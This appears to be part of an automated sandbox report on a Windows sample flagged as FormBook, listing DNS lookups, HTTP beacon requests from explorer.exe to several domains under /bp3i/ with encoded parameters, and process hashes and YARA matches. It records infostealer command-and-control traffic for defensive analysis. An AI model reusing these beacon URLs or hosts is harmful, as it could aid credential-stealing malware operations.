Jun 11, 2021 08:53:45.971321106 CEST | 53 | 61374 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:53:48.516494989 CEST | 50339 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:53:48.569454908 CEST | 53 | 50339 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:53:49.725511074 CEST | 63307 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:53:49.779050112 CEST | 53 | 63307 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:53:51.321696997 CEST | 49694 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:53:51.371913910 CEST | 53 | 49694 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:54:04.719906092 CEST | 54982 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:54:04.789838076 CEST | 53 | 54982 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:54:29.080950022 CEST | 50010 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:54:29.220621109 CEST | 53 | 50010 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:54:30.560714960 CEST | 63718 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:54:30.695548058 CEST | 53 | 63718 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:54:32.433160067 CEST | 62116 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:54:32.493107080 CEST | 53 | 62116 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:54:32.976608038 CEST | 63816 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:54:33.038295984 CEST | 53 | 63816 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:54:33.641520023 CEST | 55014 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:54:33.702112913 CEST | 53 | 55014 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:54:34.126894951 CEST | 62208 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:54:34.203109026 CEST | 53 | 62208 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:54:34.358794928 CEST | 57574 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:54:34.410713911 CEST | 53 | 57574 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:54:35.248476028 CEST | 51818 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:54:35.312026024 CEST | 53 | 51818 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:54:37.320607901 CEST | 56628 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:54:37.381854057 CEST | 53 | 56628 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:54:38.643691063 CEST | 60778 | 53 | 192.168.2.6 | 8.8.8.8
                                                                                                          Jun 11, 2021 08:54:38.708317995 CEST53607788.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:54:39.615343094 CEST5379953192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:54:39.673851967 CEST53537998.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:54:53.369669914 CEST5468353192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:54:53.437954903 CEST53546838.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:54:58.502868891 CEST5932953192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:54:59.548690081 CEST5932953192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:00.595551968 CEST5932953192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:02.642966032 CEST5932953192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:03.557312012 CEST53593298.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:04.602385044 CEST53593298.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:05.650899887 CEST53593298.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:06.459764957 CEST6402153192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:06.525445938 CEST53640218.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:07.697957039 CEST53593298.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:08.839224100 CEST5612953192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:08.903072119 CEST53561298.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:14.503674984 CEST5817753192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:14.679604053 CEST53581778.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:14.702935934 CEST5070053192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:14.777853012 CEST53507008.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:17.314508915 CEST5406953192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:17.376267910 CEST53540698.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:19.808238029 CEST6117853192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:20.105509996 CEST53611788.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:25.518785954 CEST5701753192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:25.697938919 CEST53570178.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:31.419163942 CEST5632753192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:31.712347031 CEST53563278.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:37.343261957 CEST5024353192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:37.424470901 CEST53502438.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:42.870754004 CEST6205553192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:42.935358047 CEST53620558.8.8.8192.168.2.6

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jun 11, 2021 08:55:04.602555037 CEST | 192.168.2.6 | 8.8.8.8 | cffd | (Port unreachable) | Destination Unreachable
Jun 11, 2021 08:55:05.651055098 CEST | 192.168.2.6 | 8.8.8.8 | cffd | (Port unreachable) | Destination Unreachable
Jun 11, 2021 08:55:07.699033022 CEST | 192.168.2.6 | 8.8.8.8 | cffd | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 11, 2021 08:54:58.502868891 CEST | 192.168.2.6 | 8.8.8.8 | 0x392f | Standard query (0) | www.bluebeltpanobuy.com | A (IP address) | IN (0x0001)
Jun 11, 2021 08:54:59.548690081 CEST | 192.168.2.6 | 8.8.8.8 | 0x392f | Standard query (0) | www.bluebeltpanobuy.com | A (IP address) | IN (0x0001)
Jun 11, 2021 08:55:00.595551968 CEST | 192.168.2.6 | 8.8.8.8 | 0x392f | Standard query (0) | www.bluebeltpanobuy.com | A (IP address) | IN (0x0001)
Jun 11, 2021 08:55:02.642966032 CEST | 192.168.2.6 | 8.8.8.8 | 0x392f | Standard query (0) | www.bluebeltpanobuy.com | A (IP address) | IN (0x0001)
Jun 11, 2021 08:55:08.839224100 CEST | 192.168.2.6 | 8.8.8.8 | 0xb9a0 | Standard query (0) | www.thechandeck.com | A (IP address) | IN (0x0001)
Jun 11, 2021 08:55:14.503674984 CEST | 192.168.2.6 | 8.8.8.8 | 0x8467 | Standard query (0) | www.bancambios.network | A (IP address) | IN (0x0001)
Jun 11, 2021 08:55:19.808238029 CEST | 192.168.2.6 | 8.8.8.8 | 0x15d8 | Standard query (0) | www.purpleqube.com | A (IP address) | IN (0x0001)
Jun 11, 2021 08:55:25.518785954 CEST | 192.168.2.6 | 8.8.8.8 | 0x8775 | Standard query (0) | www.middreampostal.com | A (IP address) | IN (0x0001)
Jun 11, 2021 08:55:31.419163942 CEST | 192.168.2.6 | 8.8.8.8 | 0xc2f9 | Standard query (0) | www.xn---yado-8e4dze0c.site | A (IP address) | IN (0x0001)
Jun 11, 2021 08:55:37.343261957 CEST | 192.168.2.6 | 8.8.8.8 | 0xc9db | Standard query (0) | www.oceancollaborative.com | A (IP address) | IN (0x0001)
Jun 11, 2021 08:55:42.870754004 CEST | 192.168.2.6 | 8.8.8.8 | 0x73f9 | Standard query (0) | www.t4mall.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 11, 2021 08:55:03.557312012 CEST | 8.8.8.8 | 192.168.2.6 | 0x392f | Server failure (2) | www.bluebeltpanobuy.com | none | none | A (IP address) | IN (0x0001)
Jun 11, 2021 08:55:04.602385044 CEST | 8.8.8.8 | 192.168.2.6 | 0x392f | Server failure (2) | www.bluebeltpanobuy.com | none | none | A (IP address) | IN (0x0001)
Jun 11, 2021 08:55:05.650899887 CEST | 8.8.8.8 | 192.168.2.6 | 0x392f | Server failure (2) | www.bluebeltpanobuy.com | none | none | A (IP address) | IN (0x0001)
Jun 11, 2021 08:55:07.697957039 CEST | 8.8.8.8 | 192.168.2.6 | 0x392f | Server failure (2) | www.bluebeltpanobuy.com | none | none | A (IP address) | IN (0x0001)
Jun 11, 2021 08:55:08.903072119 CEST | 8.8.8.8 | 192.168.2.6 | 0xb9a0 | No error (0) | www.thechandeck.com | | 154.215.150.183 | A (IP address) | IN (0x0001)
Jun 11, 2021 08:55:14.679604053 CEST | 8.8.8.8 | 192.168.2.6 | 0x8467 | No error (0) | www.bancambios.network | bancambios.network | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 08:55:14.679604053 CEST | 8.8.8.8 | 192.168.2.6 | 0x8467 | No error (0) | bancambios.network | | 185.224.138.83 | A (IP address) | IN (0x0001)
Jun 11, 2021 08:55:20.105509996 CEST | 8.8.8.8 | 192.168.2.6 | 0x15d8 | No error (0) | www.purpleqube.com | purpleqube.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 08:55:20.105509996 CEST | 8.8.8.8 | 192.168.2.6 | 0x15d8 | No error (0) | purpleqube.com | | 119.81.95.146 | A (IP address) | IN (0x0001)
Jun 11, 2021 08:55:25.697938919 CEST | 8.8.8.8 | 192.168.2.6 | 0x8775 | No error (0) | www.middreampostal.com | middreampostal.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 08:55:25.697938919 CEST | 8.8.8.8 | 192.168.2.6 | 0x8775 | No error (0) | middreampostal.com | | 184.175.83.64 | A (IP address) | IN (0x0001)
Jun 11, 2021 08:55:31.712347031 CEST | 8.8.8.8 | 192.168.2.6 | 0xc2f9 | No error (0) | www.xn---yado-8e4dze0c.site | | 150.95.255.38 | A (IP address) | IN (0x0001)
Jun 11, 2021 08:55:37.424470901 CEST | 8.8.8.8 | 192.168.2.6 | 0xc9db | No error (0) | www.oceancollaborative.com | oceancollaborative.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 08:55:37.424470901 CEST | 8.8.8.8 | 192.168.2.6 | 0xc9db | No error (0) | oceancollaborative.com | | 184.168.131.241 | A (IP address) | IN (0x0001)
Jun 11, 2021 08:55:42.935358047 CEST | 8.8.8.8 | 192.168.2.6 | 0x73f9 | No error (0) | www.t4mall.com | | 165.3.53.250 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.thechandeck.com
• www.bancambios.network
• www.purpleqube.com
• www.middreampostal.com
• www.xn---yado-8e4dze0c.site
• www.oceancollaborative.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49747 | 154.215.150.183 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 08:55:09.183716059 CEST | 6657 | OUT | GET /bp3i/?o6tTHHhh=p3NsgK4BERuThhH+teqwS1C0txfpjFxawwSOzHNPnDrrCpY7gJP96rzPXZQ9m0/nBd8sZePfaw==&3fuD_=S2MtYLGX0vFd HTTP/1.1
Host: www.thechandeck.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 11, 2021 08:55:09.463644028 CEST | 6657 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Jun 2021 06:55:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49748 | 185.224.138.83 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 08:55:14.730818033 CEST | 6659 | OUT | GET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=So2Tvg87hIziEtO/Cru7EIQwZdKNOPQNXuBCwKB1xQ7qfTi1ynPiyI53Zc3PyJmgTVsVUbeTjw== HTTP/1.1
Host: www.bancambios.network
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 11, 2021 08:55:14.783538103 CEST | 6660 | IN | HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Last-Modified: Tue, 25 Jun 2019 07:07:25 GMT
Etag: "999-5d11c82d-331806d17fbda5d0;;;"
Accept-Ranges: bytes
Content-Length: 2457
Date: Fri, 11 Jun 2021 06:55:14 GMT
Server: LiteSpeed
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65
Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, some


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.6 | 49751 | 119.81.95.146 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 08:55:20.305771112 CEST | 6681 | OUT | GET /bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&3fuD_=S2MtYLGX0vFd HTTP/1.1
Host: www.purpleqube.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 11, 2021 08:55:20.505008936 CEST | 6681 | IN | HTTP/1.1 302 Found
Date: Fri, 11 Jun 2021 06:55:20 GMT
Server: Apache
Location: https://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&3fuD_=S2MtYLGX0vFd
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 75 72 70 6c 65 71 75 62 65 2e 63 6f 6d 2f 62 70 33 69 2f 3f 6f 36 74 54 48 48 68 68 3d 49 6b 51 75 43 46 6c 37 4d 43 66 42 52 6a 2f 56 7a 2b 6f 39 53 5a 4b 75 34 7a 51 65 50 2b 35 48 51 4c 78 38 57 55 63 4a 62 65 56 6b 74 45 57 31 39 77 45 64 41 38 45 74 62 6d 6e 68 71 6c 53 51 61 49 59 61 6e 66 46 51 6e 51 3d 3d 26 61 6d 70 3b 33 66 75 44 5f 3d 53 32 4d 74 59 4c 47 58 30 76 46 64 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&amp;3fuD_=S2MtYLGX0vFd">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.6 | 49752 | 184.175.83.64 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 08:55:25.861802101 CEST | 6682 | OUT | GET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=IptNrmuXUVaV/Z9910/N9dyZxtPI5jyScGKXmfxiWqbBXO2QZbfIAu6+lQXyF1DTVkAc6YCxuQ== HTTP/1.1
Host: www.middreampostal.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 11, 2021 08:55:27.224795103 CEST | 6683 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: http://middreampostal.com/bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=IptNrmuXUVaV/Z9910/N9dyZxtPI5jyScGKXmfxiWqbBXO2QZbfIAu6+lQXyF1DTVkAc6YCxuQ==
Content-Length: 0
Date: Fri, 11 Jun 2021 06:55:26 GMT
Server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.6 | 49753 | 150.95.255.38 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 08:55:32.021022081 CEST | 6684 | OUT | GET /bp3i/?o6tTHHhh=G/6vsm0KxG9qmRdgnTa4hWK9fX8ri3vqlPmeKNZjc+yTORxazFkMTyGVd6qzkwgGx7fuosCohA==&3fuD_=S2MtYLGX0vFd HTTP/1.1
    Host: www.xn---yado-8e4dze0c.site
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Jun 11, 2021 08:55:32.328037977 CEST | 6684 | IN | HTTP/1.1 302 Found
    Date: Fri, 11 Jun 2021 06:55:32 GMT
    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
    Location: http://dfltweb1.onamae.com
    Content-Length: 210
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 66 6c 74 77 65 62 31 2e 6f 6e 61 6d 61 65 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://dfltweb1.onamae.com">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.6 | 49754 | 184.168.131.241 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 08:55:37.621895075 CEST | 6685 | OUT | GET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOd785YA8v1+XbYT2uw== HTTP/1.1
    Host: www.oceancollaborative.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Jun 11, 2021 08:55:37.868011951 CEST | 6686 | IN | HTTP/1.1 302 Found
    Server: nginx/1.16.1
    Date: Fri, 11 Jun 2021 06:55:37 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Location: https://afternic.com/forsale/oceancollaborative.com?utm_source=TDFS&utm_medium=sn_affiliate_click&utm_campaign=TDFS_GoDaddy_DLS&traffic_type=TDFS&traffic_id=GoDaddy_DLS
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 08:53:36
Start date: 11/06/2021
Path: C:\Users\user\Desktop\5t2CmTUhKc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
Imagebase: 0x400000
File size: 225177 bytes
MD5 hash: 116E736BA00FCA4B8499C4DF00796454
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 08:53:37
Start date: 11/06/2021
Path: C:\Users\user\Desktop\5t2CmTUhKc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
Imagebase: 0x400000
File size: 225177 bytes
MD5 hash: 116E736BA00FCA4B8499C4DF00796454
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
